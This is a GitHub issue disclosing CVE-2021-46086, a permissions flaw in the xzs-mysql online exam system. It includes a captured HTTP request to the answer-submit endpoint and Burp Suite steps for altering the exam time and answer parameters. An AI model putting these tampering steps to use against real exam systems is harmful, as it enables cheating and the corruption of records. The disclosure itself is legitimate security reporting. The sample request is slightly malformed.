Headline
CVE-2021-46086: There is a Insecure Permissions vulnerability exists in XZS · Issue #327 · mindskip/xzs-mysql
xzs-mysql >= t3.4.0 is vulnerable to Insecure Permissions. The front end of this open source system is an online examination system. There is an unsafe vulnerability in the functional method of submitting examination papers. An attacker can use burpuite to modify parameters in the packet to destroy real data.
[Suggested description]
Insecure Permissions vulnerability exists in xzs-mysql.The front end of this open source system is an online examination system. There is an unsafe vulnerability in the functional method of submitting examination papers. An attacker can use burpuite to modify parameters in the packet to destroy real data.
Post: /api/student/exampaper/answer/answerSubmit
[Vulnerability Type]
Insecure Permissions
[Vendor of Product]
https://github.com/mindskip/xzs-mysql
[Affected Product Code Base]
t3.4.0
[Affected Component]
POST /api/student/exampaper/answer/answerSubmit HTTP/1.1
Host: localhost:8000
Content-Length: 135
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: application/json, text/plain, /
X-XSRF-TOKEN: 010353a5-cfe1-4fa8-9a28-0b9cfb4ca538
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
request-ajax: true
Content-Type: application/json
Origin: http://localhost:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8000/student/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1640832435; adminUserName=admin; JSESSIONID=WIBLgnVPP4rhIJU3PzYXxEwTHTA5na4PoZADiRaS; studentUserName=test002; Hm_lpvt_cd8218cd51f800ed2b73e5751cb3f4f9=1640835202
Connection: close
{
"questionId":null,
"doTime":6,
answerItems":[
{
"questionId":1,
"content":null,
"contentArray":[
],
"completed":false,
"itemOrder":1
}
],
"id":1
}
[Attack Type]
Remote
[Impact Code execution]
false
Step 1: open the URL: http://localhost:8000/student/index.html#/paper/index , click "start answer".
The total exam time is 60 minutes. You can see the remaining time displayed in the upper right.
Step 2: open the burpsuite agent and click the submit button to obtain the packet capture data.
The value of dotime indicates the number of seconds between the beginning of this test and clicking submit torque, which can be modified to any number.